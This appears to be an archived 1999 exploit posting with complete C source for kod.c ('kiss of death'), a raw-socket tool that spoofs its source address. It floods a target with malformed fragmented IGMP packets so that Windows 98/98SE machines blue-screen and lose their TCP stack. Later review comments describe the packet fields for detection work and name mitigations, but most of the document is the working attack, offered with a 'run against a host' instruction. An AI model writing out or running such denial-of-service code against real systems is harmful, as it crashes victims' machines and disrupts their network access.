
windows_kod.txt
Posted Sep 21, 1999

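kod.c ("kiss of death"): proof-of-concept for an IGMP-handling bug in the Windows 98/98SE IP stack that blue-screens the target and kills its TCP stack.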

tags | exploit
systems | windows
SHA-256 | 857bcd83acadf4ca3d04875c6abf06e8f57153142eecdc13c9955daaf903dc97

Subject:      ip stack bug in windows kod.c(kiss of death)
To: BUGTRAQ@netspace.org


/*
::: kod.c (kiss of death) version 1.2
::: [author] kod.c bug found by klepto /
klepto@levitate.net / rewritten by ignitor / ignitor@EFnet
::: [stuph ] works on bsd/linux/*nix
::: [notes ] bluescreens windows users(98/98se) and kills
tcp stack
::: [m$ bug] windows handles igmp badly and this is the
result
::: [greets]
amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotr
ip/TFreak/napster
::: [greets] dist(test monkey)/naz(you rule period.)/#havok/
#irc_addict/#kgb/#eof/everyone
::: [action] ./kod <host> and BEWM!
::: [rant ] there will be lots of rewrites to this.. just
get our name right!
de omnibus dubitandum
*/


/*
windows core dump output (*whee*)
An exception 0E has occurred at 0028:C14C9212 in VxD VIP
(01) +
00006C72. This was called from 0028:C183FF54 in VcD PPPMAC
(04) +
000079BR. It may be possible to continue normally(*not*).
*/



#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>


/*
 * Local definition of a 20-byte IPv4 header without options, overlaid on the
 * start of the send buffer in main().
 *
 * NOTE(review): declaring ihl before version matches the on-wire nibble order
 * only where the compiler allocates bit-fields starting from the low-order
 * bits (typical of little-endian ABIs); elsewhere the two nibbles would swap.
 */
struct iphdr {
    unsigned char  ihl : 4;      /* header length, in 32-bit words */
    unsigned char  version : 4;  /* IP version */
    unsigned char  tos;          /* type of service */
    unsigned short tot_len;      /* total length field (stored with htons by main) */
    unsigned short id;           /* identification field (stored with htons by main) */
    unsigned short frag_off;     /* flag bits plus fragment offset (stored with htons by main) */
    unsigned char  ttl;          /* time to live */
    unsigned char  protocol;     /* payload protocol number */
    unsigned short check;        /* header checksum */
    unsigned int   saddr;        /* source address, as returned by resolve() */
    unsigned int   daddr;        /* destination address, as returned by resolve() */
};


/*
 * Local definition of an 8-byte IGMP header. main() points a variable of this
 * type just past the IP header but never stores to any of its fields, so the
 * bytes it covers stay zero from the earlier memset().
 */
struct igmphdr {
    unsigned char  type;   /* IGMP message type */
    unsigned char  code;   /* second header byte */
    unsigned short cksum;  /* IGMP checksum field */
    struct in_addr group;  /* group address */
};


/* Forward declarations for the two helpers defined in this file. */
/* 16-bit one's-complement checksum over len bytes starting at the pointer. */
unsigned short in_chksum(unsigned short *, int);
/* Host name to IPv4 address via gethostbyname(); returns -1 on lookup failure. */
long resolve(char *);


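/*
 * Resolve a host name or dotted-quad string to an IPv4 address.
 *
 * host  name or numeric address handed to gethostbyname()
 *
 * Returns the 4-byte address exactly as gethostbyname() supplied it, widened
 * to long, or -1 when host is NULL, the lookup fails, or the result is not a
 * 4-byte AF_INET address.
 *
 * Where long is 32 bits wide, 255.255.255.255 cannot be told apart from the
 * -1 failure value; callers that care must validate the input separately.
 */
long resolve(char *host)
{
    struct hostent *hst;
    struct in_addr in;

    if (host == NULL)
        return -1;

    hst = gethostbyname(host);
    if (hst == NULL || hst->h_addr_list == NULL || hst->h_addr_list[0] == NULL)
        return -1;

    /*
     * Copy into a correctly sized object and only after checking the family
     * and length. Copying h_length bytes into an uninitialised long left the
     * upper bytes indeterminate on LP64 and trusted the resolver's length.
     */
    if (hst->h_addrtype != AF_INET || hst->h_length != (int)sizeof in)
        return -1;

    /* h_addr_list[0] is used directly; the h_addr alias is not always defined. */
    memcpy(&in, hst->h_addr_list[0], sizeof in);

    return (long)in.s_addr;
}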


/*
 * Entry point of the proof-of-concept. Builds a single IPv4 header with
 * protocol IGMP at the start of a zeroed 1500-byte buffer and sends that
 * buffer repeatedly over a raw socket, changing only the fragment-offset
 * field (and recomputing the header checksum) between sends.
 *
 * argv[1] is written into the header as the source address, argv[2] as the
 * destination; both go through resolve(). Every path that returns from main
 * returns 1 (usage error, socket() failure and normal completion alike); a
 * failed sendto() exits with -1.
 *
 * What the constants below put into each datagram, for anyone writing a
 * detection or reading a capture:
 *   - IP protocol IGMP, TTL 64, identification 48648, total-length field 10933
 *     (which matches neither of the lengths handed to sendto());
 *   - each outer pass sends 11 buffers: one 220-byte buffer with offset 0x73a
 *     and no flag bits, then ten 1500-byte buffers with the 0x2000 flag bit
 *     set and the offset stepping from 0x681 down to 0 in steps of 185;
 *   - everything after the IP header is zero bytes, because the igmp pointer
 *     is assigned but never written through.
 * NOTE(review): whether the sending kernel rewrites any of these header fields
 * before transmission cannot be determined from this file.
 * Fragmented IGMP has little legitimate use; filtering it at the network edge
 * and applying the vendor fix for the affected Windows releases are the
 * mitigations to check for.
 */
int main(int argc, char *argv[])
{
struct sockaddr_in dst;
struct iphdr *ip;
struct igmphdr *igmp;
long daddr, saddr;
int s, i=0, c, len;
char buf[1500];


/* Two positional arguments are required; print usage otherwise. */
if (argc < 3)
{
printf("KOD spoofer by Ignitor and klepto\n");
printf("Usage: %s <src> <dst>\n", *argv);
return(1);
}


/* NOTE(review): resolve() returns -1 on lookup failure and neither result is
   checked before being used as an address below. */
daddr = resolve(argv[2]);
saddr = resolve(argv[1]);


/* Zero the whole buffer, then overlay the two header structs on it. */
memset(buf, 0, 1500);
ip = (struct iphdr *)&buf;
/* igmp is only assigned here; no field of it is ever stored to. */
igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)];


/* NOTE(review): dst is not zero-initialised; only these two members are set. */
dst.sin_addr.s_addr = daddr;
dst.sin_family = AF_INET;


/* Fixed header fields; frag_off is filled in inside the send loop. */
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = htons(10933);
ip->id = htons(48648);
ip->ttl = 64;
ip->protocol = IPPROTO_IGMP;
/* NOTE(review): this checksum is taken before saddr and daddr are stored, so
   it does not cover the addresses written on the next two lines. */
ip->check = in_chksum((unsigned short *)ip, sizeof(struct
iphdr));
ip->saddr = saddr;
ip->daddr = daddr;


/* Raw socket; the descriptor is never closed before main returns. */
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);


printf("Sending IGMP packets: %s -> %s\n", argv[1], argv
[2]);


/* The whole sequence is sent twice. */
for (c=0;c<2;c++)
{
/* First buffer of a pass: 220 bytes, offset 0x73a, no flag bits. */
len = 220;
ip->frag_off = htons(0x73a);


for (i=0;;i++)
{
if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,sizeof
(struct sockaddr_in)) == -1)
{
perror("Error sending packet");
exit(-1);
}
/* Stop once the buffer carrying offset 0 with the 0x2000 flag has been sent. */
if (ntohs(ip->frag_off) == 0x2000)
break;
/* Every later buffer is the full 1500 bytes. */
len = 1500;
/* After the first send jump to 0x2681 (flag 0x2000 plus offset 0x681), then
   step the offset down by 185 per send; 185 * 8 equals 1500 minus the
   20-byte header. */
if (!i)
ip->frag_off = htons(0x2681);
else
ip->frag_off = htons(ntohs(ip->frag_off) - 185);


/* NOTE(review): ip->check still holds the previous checksum while this one is
   computed, so the stored value is not a plain checksum of the new header;
   the checksum in a capture should not be treated as a stable indicator. */
ip->check = in_chksum((unsigned short *)ip, sizeof
(struct iphdr));
}
}


/* Normal completion also returns 1. */
return(1);
}


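/*
 * Internet checksum in the style of RFC 1071: the one's complement of the
 * one's-complement sum of the buffer, read as 16-bit words in memory order.
 *
 * addr  start of the data; it is read through an unsigned short pointer
 * len   number of bytes to cover; a value <= 0 yields 0xffff
 *
 * Returns the 16-bit checksum in the same byte order the words were read in,
 * so it can be stored straight back into the buffer.
 */
unsigned short in_chksum(unsigned short *addr, int len)
{
    /* Unsigned accumulator: a signed int could overflow on large buffers, and
       right-shifting a negative value is implementation-defined. */
    unsigned long sum = 0;
    int nleft = len;

    while (nleft > 1) {
        sum += *addr++;
        nleft -= 2;
        /* Fold early so the accumulator cannot run out of bits even when
           unsigned long is only 32 bits wide. */
        if (sum & 0x80000000UL)
            sum = (sum & 0xffffUL) + (sum >> 16);
    }

    /* A trailing odd byte is placed in the first byte of a zeroed word, the
       same position it would occupy in memory. */
    if (nleft == 1) {
        unsigned short tail = 0;

        *(unsigned char *)&tail = *(const unsigned char *)addr;
        sum += tail;
    }

    /* Add the carries back in until the sum fits in 16 bits. */
    while (sum >> 16)
        sum = (sum & 0xffffUL) + (sum >> 16);

    return (unsigned short)(~sum & 0xffffUL);
}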